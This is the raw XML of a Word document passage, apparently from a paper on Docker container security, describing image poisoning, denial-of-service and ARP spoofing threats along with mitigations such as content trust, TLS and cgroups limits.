      <w:r w:rsidR="001A74C5">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="0038250C">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00F73043">
        <w:t xml:space="preserve">poison the images with some </w:t>
      </w:r>
      <w:r w:rsidR="002B4109">
        <w:t xml:space="preserve">malwares or viruses </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F01349">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F01349">
        <w:t xml:space="preserve"> gain access or </w:t>
      </w:r>
      <w:r w:rsidR="001E107F">
        <w:t>perform malicious activities.</w:t>
      </w:r>
      <w:r w:rsidR="009E56A7">
        <w:t xml:space="preserve"> Alternatively, </w:t>
      </w:r>
      <w:r w:rsidR="00047239">
        <w:t xml:space="preserve">attackers can </w:t>
      </w:r>
      <w:r w:rsidR="005E0863">
        <w:t xml:space="preserve">use outdated or vulnerable applications </w:t>
      </w:r>
      <w:r w:rsidR="00D441A1">
        <w:t xml:space="preserve">to poison images </w:t>
      </w:r>
      <w:r w:rsidR="00656DC0">
        <w:t xml:space="preserve">and push them </w:t>
      </w:r>
      <w:r w:rsidR="001F4FC6">
        <w:t>to public repositories</w:t>
      </w:r>
      <w:r w:rsidR="00ED74A8">
        <w:t xml:space="preserve">. As such, </w:t>
      </w:r>
      <w:r w:rsidR="006D4D49">
        <w:t xml:space="preserve">someone </w:t>
      </w:r>
      <w:r w:rsidR="00756E78">
        <w:t xml:space="preserve">can download that image without </w:t>
      </w:r>
      <w:r w:rsidR="008538A4">
        <w:t xml:space="preserve">checking </w:t>
      </w:r>
      <w:r w:rsidR="004E0A7E">
        <w:t xml:space="preserve">and verifying its </w:t>
      </w:r>
      <w:r w:rsidR="0092153C">
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidR="00FB1D1C">
        <w:t xml:space="preserve">, allowing the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00A05172">
        <w:t>exploit and</w:t>
      </w:r>
      <w:r w:rsidR="00E671A1">
        <w:t xml:space="preserve"> steal sensitive information</w:t>
      </w:r>
      <w:r w:rsidR="0036384A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E7AA4">
        <w:t xml:space="preserve"> Further, image </w:t>
      </w:r>
      <w:r w:rsidR="007E7AA4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vulnerabilities can </w:t>
      </w:r>
      <w:r w:rsidR="00A06F8E">
        <w:t xml:space="preserve">enable hijackers to </w:t>
      </w:r>
      <w:r w:rsidR="00E75BFA">
        <w:t>insert backdoor</w:t>
      </w:r>
      <w:r w:rsidR="0078180E">
        <w:t xml:space="preserve">s to run cryptocurrency </w:t>
      </w:r>
      <w:r w:rsidR="00440B40">
        <w:t>mining malware</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-200244734"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:instrText xml:space="preserve"> CITATION JRu14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A74D34">
            <w:instrText xml:space="preserve"> \m DFG21</w:instrText>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[58, 59]</w:t>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E671A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192AFFD" w14:textId="02438E58" w:rsidR="00A46275" w:rsidRDefault="00A46275" w:rsidP="001351C8">
      <w:r>
        <w:t xml:space="preserve">For better security, </w:t>
      </w:r>
      <w:r w:rsidR="00064260">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00050186">
        <w:t xml:space="preserve">Docker registry API </w:t>
      </w:r>
      <w:r w:rsidR="005D7C87">
        <w:t xml:space="preserve">should run </w:t>
      </w:r>
      <w:r w:rsidR="00AC5762">
        <w:t>in a</w:t>
      </w:r>
      <w:r w:rsidR="00F72DC1">
        <w:t xml:space="preserve"> secure env</w:t>
      </w:r>
      <w:r w:rsidR="006F46B4">
        <w:t xml:space="preserve">ironment </w:t>
      </w:r>
      <w:r w:rsidR="00CE6070">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004A6A01">
        <w:t>thwart poisoning attacks</w:t>
      </w:r>
      <w:r w:rsidR="0080610F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA526C">
        <w:t xml:space="preserve"> Another </w:t>
      </w:r>
      <w:r w:rsidR="005D65B2">
        <w:t xml:space="preserve">method to mitigate such attacks is </w:t>
      </w:r>
      <w:r w:rsidR="00137C0A">
        <w:t xml:space="preserve">to use DCT </w:t>
      </w:r>
      <w:r w:rsidR="00223A9B">
        <w:t xml:space="preserve">to ensure that </w:t>
      </w:r>
      <w:r w:rsidR="00CD2F4E">
        <w:t xml:space="preserve">only authenticated and trusted images are used </w:t>
      </w:r>
      <w:r w:rsidR="007633EC">
        <w:t>within the Docker cluster.</w:t>
      </w:r>
      <w:r w:rsidR="00BE177D">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="007E7972">
        <w:t>the API connection should</w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="007E7972">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t>secured using TLS</w:t>
      </w:r>
      <w:r w:rsidR="00B233D2">
        <w:t xml:space="preserve"> and proxy connections</w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF524D">
        <w:t xml:space="preserve">to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00E56525">
        <w:t>malicious image execution.</w:t>
      </w:r>
      <w:r w:rsidR="00713E87">
        <w:t xml:space="preserve"> Also, </w:t>
      </w:r>
      <w:r w:rsidR="00757BE5">
        <w:t xml:space="preserve">the local </w:t>
      </w:r>
      <w:r w:rsidR="007F1ECD">
        <w:t xml:space="preserve">docker.io </w:t>
      </w:r>
      <w:r w:rsidR="00C256AE">
        <w:t>must be</w:t>
      </w:r>
      <w:r w:rsidR="007F1ECD">
        <w:t xml:space="preserve"> disabled to prevent </w:t>
      </w:r>
      <w:r w:rsidR="007D2874">
        <w:t xml:space="preserve">such security </w:t>
      </w:r>
      <w:r w:rsidR="00FA6BB6">
        <w:t>problems</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-825512519"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:instrText xml:space="preserve"> CITATION DFG21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E91BD9">
            <w:instrText xml:space="preserve"> \m doc16</w:instrText>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[59, 47]</w:t>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA6BB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569C0E7" w14:textId="34142E33" w:rsidR="00EF6313" w:rsidRDefault="00745D3C" w:rsidP="00DA4F65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc87032902"/>
      <w:r>
        <w:t xml:space="preserve">Denial of Service </w:t>
      </w:r>
      <w:r w:rsidR="00AF34D7">
        <w:t>(Dos)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="3746FBF1" w14:textId="1B2D585A" w:rsidR="008B468D" w:rsidRDefault="003E1486" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">A Denial of service (Dos) </w:t>
      </w:r>
      <w:r w:rsidR="0044773B">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="008972C3">
        <w:t xml:space="preserve"> a type </w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t>of attack</w:t>
      </w:r>
      <w:r w:rsidR="003275B1">
        <w:t xml:space="preserve"> that is more common on network resources.</w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E14833">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E14833">
        <w:t xml:space="preserve">ually, it </w:t>
      </w:r>
      <w:r w:rsidR="00902EBA">
        <w:t xml:space="preserve">aims to </w:t>
      </w:r>
      <w:r w:rsidR="00E66CDF">
        <w:t>exhaust the victim</w:t>
      </w:r>
      <w:r w:rsidR="008B3D1E">
        <w:t xml:space="preserve">’s systems resources by inundating with </w:t>
      </w:r>
      <w:r w:rsidR="008B43E4">
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidR="00C74453">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008B43E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5EE6">
        <w:t xml:space="preserve">eventually </w:t>
      </w:r>
      <w:r w:rsidR="00464C65">
        <w:t xml:space="preserve">blocking the </w:t>
      </w:r>
      <w:r w:rsidR="00C74453">
        <w:t>regular</w:t>
      </w:r>
      <w:r w:rsidR="00770EEE">
        <w:t xml:space="preserve"> traffic from being processed.</w:t>
      </w:r>
      <w:r w:rsidR="0004069E">
        <w:t xml:space="preserve"> Dos vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="005F7159">
        <w:t xml:space="preserve">allow an attacker to consume </w:t>
      </w:r>
      <w:r w:rsidR="0087667E">
        <w:t xml:space="preserve">the host’s system resources, such as CPU </w:t>
      </w:r>
      <w:r w:rsidR="004F55F1">
        <w:t xml:space="preserve">and memory </w:t>
      </w:r>
      <w:r w:rsidR="00122075">
        <w:t xml:space="preserve">and crash the </w:t>
      </w:r>
      <w:r w:rsidR="00D763F3">
        <w:t>system.</w:t>
      </w:r>
      <w:r w:rsidR="00A70103">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A58">
        <w:t xml:space="preserve">Such an attack can also </w:t>
      </w:r>
      <w:r w:rsidR="00AC247E">
        <w:t>occur</w:t>
      </w:r>
      <w:r w:rsidR="00343A58">
        <w:t xml:space="preserve"> on containers </w:t>
      </w:r>
      <w:r w:rsidR="00AC247E">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00227AD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7F48">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0005699C">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00802CC2">
        <w:t xml:space="preserve"> directly</w:t>
      </w:r>
      <w:r w:rsidR="0005699C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C016E">
        <w:t xml:space="preserve">communicate </w:t>
      </w:r>
      <w:r w:rsidR="003C4154">
        <w:t>with the host kernel</w:t>
      </w:r>
      <w:r w:rsidR="000961D6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00834C75">
        <w:t xml:space="preserve">share </w:t>
      </w:r>
      <w:r w:rsidR="002F68EE">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00834C75">
        <w:t xml:space="preserve"> resources</w:t>
      </w:r>
      <w:r w:rsidR="000204C6">
        <w:t>, such as memory, CPU, and I/O disks</w:t>
      </w:r>
      <w:r w:rsidR="007D333A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00345B48">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00F95C05">
        <w:t xml:space="preserve">system design </w:t>
      </w:r>
      <w:r w:rsidR="000A1082">
        <w:t xml:space="preserve">increases the security </w:t>
      </w:r>
      <w:r w:rsidR="007E5D89">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="004823CA">
        <w:t xml:space="preserve"> and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="007E5D89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004823CA">
        <w:t>on containers.</w:t>
      </w:r>
      <w:r w:rsidR="00EE3B5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B0717">
        <w:t xml:space="preserve">Usually, Dos </w:t>
      </w:r>
      <w:r w:rsidR="000F339D">
        <w:t xml:space="preserve">attack takes place when </w:t>
      </w:r>
      <w:r w:rsidR="00C47135">
        <w:t xml:space="preserve">a single </w:t>
      </w:r>
      <w:r w:rsidR="00D40CF1">
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r w:rsidR="00C47135">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00214F66">
        <w:t xml:space="preserve">consumes </w:t>
      </w:r>
      <w:r w:rsidR="00410B28">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002F6638">
        <w:t>particular resource of the host</w:t>
      </w:r>
      <w:r w:rsidR="00224D04">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0041510F">
        <w:t>deny</w:t>
      </w:r>
      <w:r w:rsidR="00224D04">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="0041510F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006C82">
        <w:t xml:space="preserve">all other containers </w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t>or crash</w:t>
      </w:r>
      <w:r w:rsidR="00160EE7">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t xml:space="preserve"> the host</w:t>
      </w:r>
      <w:r w:rsidR="00160EE7">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00853D79">
        <w:t xml:space="preserve"> Thus, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00594415">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00CF0F42">
        <w:t>manipulate the container to conduct</w:t>
      </w:r>
      <w:r w:rsidR="0084251B">
        <w:t xml:space="preserve"> various attacks, including DoS and </w:t>
      </w:r>
      <w:r w:rsidR="00F03094">
        <w:t>user-privilege escalation</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1182551774"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:instrText xml:space="preserve"> CITATION JCh16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C615F0">
            <w:instrText xml:space="preserve"> \m MId21</w:instrText>
          </w:r>
          <w:r w:rsidR="00E25F3E">
            <w:instrText xml:space="preserve"> \m SSh20</w:instrText>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[60, 61, 62]</w:t>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F03094">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC46583" w14:textId="3211EC9E" w:rsidR="00B23842" w:rsidRDefault="00B23842" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">The result of Dos attack </w:t>
      </w:r>
      <w:r w:rsidR="00D532B3">
        <w:t xml:space="preserve">on containers is usually </w:t>
      </w:r>
      <w:r w:rsidR="00F6243E">
        <w:t>exhausting the host’s resources</w:t>
      </w:r>
      <w:r w:rsidR="00150B2C">
        <w:t xml:space="preserve">. However, it can be mitigated using various </w:t>
      </w:r>
      <w:r w:rsidR="00826476">
        <w:t>techniques.</w:t>
      </w:r>
      <w:r w:rsidR="00DF22C0">
        <w:t xml:space="preserve"> One of the effective measures is to </w:t>
      </w:r>
      <w:r w:rsidR="006814E2">
        <w:t>limit resources allocation to each container in</w:t>
      </w:r>
      <w:r w:rsidR="00202EEE">
        <w:t xml:space="preserve"> the Docker cluster.</w:t>
      </w:r>
      <w:r w:rsidR="007D127F">
        <w:t xml:space="preserve"> To achieve this</w:t>
      </w:r>
      <w:r w:rsidR="00E56811">
        <w:t xml:space="preserve">, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00291CF6">
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidR="00E56811">
        <w:t xml:space="preserve"> Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="00607C9B">
        <w:t xml:space="preserve">, a Linux kernel feature to </w:t>
      </w:r>
      <w:r w:rsidR="0031145B">
        <w:t>allocate</w:t>
      </w:r>
      <w:r w:rsidR="00607C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D01A0">
        <w:t>resources manually to each container</w:t>
      </w:r>
      <w:r w:rsidR="00AB23C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B1473">
        <w:t xml:space="preserve"> The Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="002275CE">
        <w:t xml:space="preserve"> provide useful metrics </w:t>
      </w:r>
      <w:r w:rsidR="007F7A82">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004B1473">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00270D0B">
        <w:t xml:space="preserve">ensures each container </w:t>
      </w:r>
      <w:r w:rsidR="00C3564B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00D92714">
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D92714">
        <w:t>its allocated resources</w:t>
      </w:r>
      <w:r w:rsidR="00DD10C4">
        <w:t xml:space="preserve">, preventing </w:t>
      </w:r>
      <w:r w:rsidR="00C43CE9">
        <w:t>denial of service attack</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A2D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00347ECD">
        <w:t xml:space="preserve"> They are also essential </w:t>
      </w:r>
      <w:r w:rsidR="00A646E4">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00C76D8C">
        <w:t>control and manage resources</w:t>
      </w:r>
      <w:r w:rsidR="00146E4E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006437D8">
        <w:t xml:space="preserve"> specifically on</w:t>
      </w:r>
      <w:r w:rsidR="00C76D8C">
        <w:t xml:space="preserve"> multi-tenant </w:t>
      </w:r>
      <w:r w:rsidR="00C316C2">
        <w:t>platforms</w:t>
      </w:r>
      <w:r w:rsidR="0035524A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C97F79">
        <w:t>like PaaS</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-248346056"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A5793A">
            <w:instrText xml:space="preserve"> \m JCh16</w:instrText>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35, 60]</w:t>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0035524A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541881B" w14:textId="61C0A099" w:rsidR="00E25F3E" w:rsidRDefault="00B063AA" w:rsidP="00B063AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc87032903"/>
      <w:r>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r w:rsidR="007E412A">
        <w:t>Poisoning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidR="007E412A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A96FBC" w14:textId="4B9BCBE1" w:rsidR="00B35CEC" w:rsidRDefault="0066771D" w:rsidP="00DA4F65">
      <w:r>
        <w:t>Address Resolution Protocol (ARP)</w:t>
      </w:r>
      <w:r w:rsidR="00D101C4">
        <w:t xml:space="preserve"> is a communication protocol that operates </w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="00D75407">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t>data link layer</w:t>
      </w:r>
      <w:r w:rsidR="00A63667">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00BC5808">
        <w:t>reso</w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t>lve</w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A63667">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t xml:space="preserve">MAC address to </w:t>
      </w:r>
      <w:r w:rsidR="001122BF">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t>known</w:t>
      </w:r>
      <w:r w:rsidR="001122BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t>IP address.</w:t>
      </w:r>
      <w:r w:rsidR="006605C9">
        <w:t xml:space="preserve"> It </w:t>
      </w:r>
      <w:r w:rsidR="00CB03C2">
        <w:t xml:space="preserve">functions without </w:t>
      </w:r>
      <w:r w:rsidR="00680A53">
        <w:t xml:space="preserve">applying any security measures. </w:t>
      </w:r>
      <w:r w:rsidR="000B60E1">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="002E3007">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00954AAD">
        <w:t xml:space="preserve"> means</w:t>
      </w:r>
      <w:r w:rsidR="00D0480B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B35CEC">
        <w:t>that it is v</w:t>
      </w:r>
      <w:r w:rsidR="00F2358B">
        <w:t>ulnerable to various threats, like ARP spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00A40D49">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00AC22EA">
        <w:t>takes place only on LAN</w:t>
      </w:r>
      <w:r w:rsidR="006A145D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t xml:space="preserve"> ARP spoofing </w:t>
      </w:r>
      <w:r w:rsidR="00A9314B">
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00346AEA">
        <w:t xml:space="preserve"> technique that</w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807A75">
        <w:t xml:space="preserve">allows a malicious actor to </w:t>
      </w:r>
      <w:r w:rsidR="00807A75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">send </w:t>
      </w:r>
      <w:r w:rsidR="001229DD">
        <w:t xml:space="preserve">falsified </w:t>
      </w:r>
      <w:r w:rsidR="00051068">
        <w:t xml:space="preserve">ARP messages </w:t>
      </w:r>
      <w:r w:rsidR="00E72F79">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="0042733D">
        <w:t xml:space="preserve">target machine </w:t>
      </w:r>
      <w:r w:rsidR="002128CF">
        <w:t>over a LAN</w:t>
      </w:r>
      <w:r w:rsidR="0026671F">
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="001E69CC">
        <w:t xml:space="preserve">enables the attacker to intercept the communication </w:t>
      </w:r>
      <w:r w:rsidR="009B11C0">
        <w:t>and steal useful information</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="882449184"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:instrText xml:space="preserve"> CITATION MDa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[63]</w:t>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="009B11C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD66A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A1C46" w14:textId="756D4491" w:rsidR="007F7A82" w:rsidRDefault="00004567" w:rsidP="00DA4F65">
      <w:r>
        <w:t>Docker supports various types of network</w:t>
      </w:r>
      <w:r w:rsidR="00E65200">
        <w:t xml:space="preserve"> modes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to provide connectivity between contai</w:t>
      </w:r>
      <w:r w:rsidR="00E65200">
        <w:t>ners and the host.</w:t>
      </w:r>
      <w:r w:rsidR="00781200">
        <w:t xml:space="preserve"> It creates </w:t>
      </w:r>
      <w:r w:rsidR="00F444A7">
        <w:t xml:space="preserve">a default virtual bridge </w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E25FB4">
        <w:t xml:space="preserve"> form </w:t>
      </w:r>
      <w:r w:rsidR="00BC05C7">
        <w:t>a LAN</w:t>
      </w:r>
      <w:r w:rsidR="00D87466">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00377134">
        <w:t xml:space="preserve">enabling </w:t>
      </w:r>
      <w:r w:rsidR="00BD5FBA">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="00BC05C7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00081027">
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t xml:space="preserve"> the same host</w:t>
      </w:r>
      <w:r w:rsidR="00377134">
        <w:t xml:space="preserve"> to communicate</w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE6797">
        <w:t xml:space="preserve"> This means </w:t>
      </w:r>
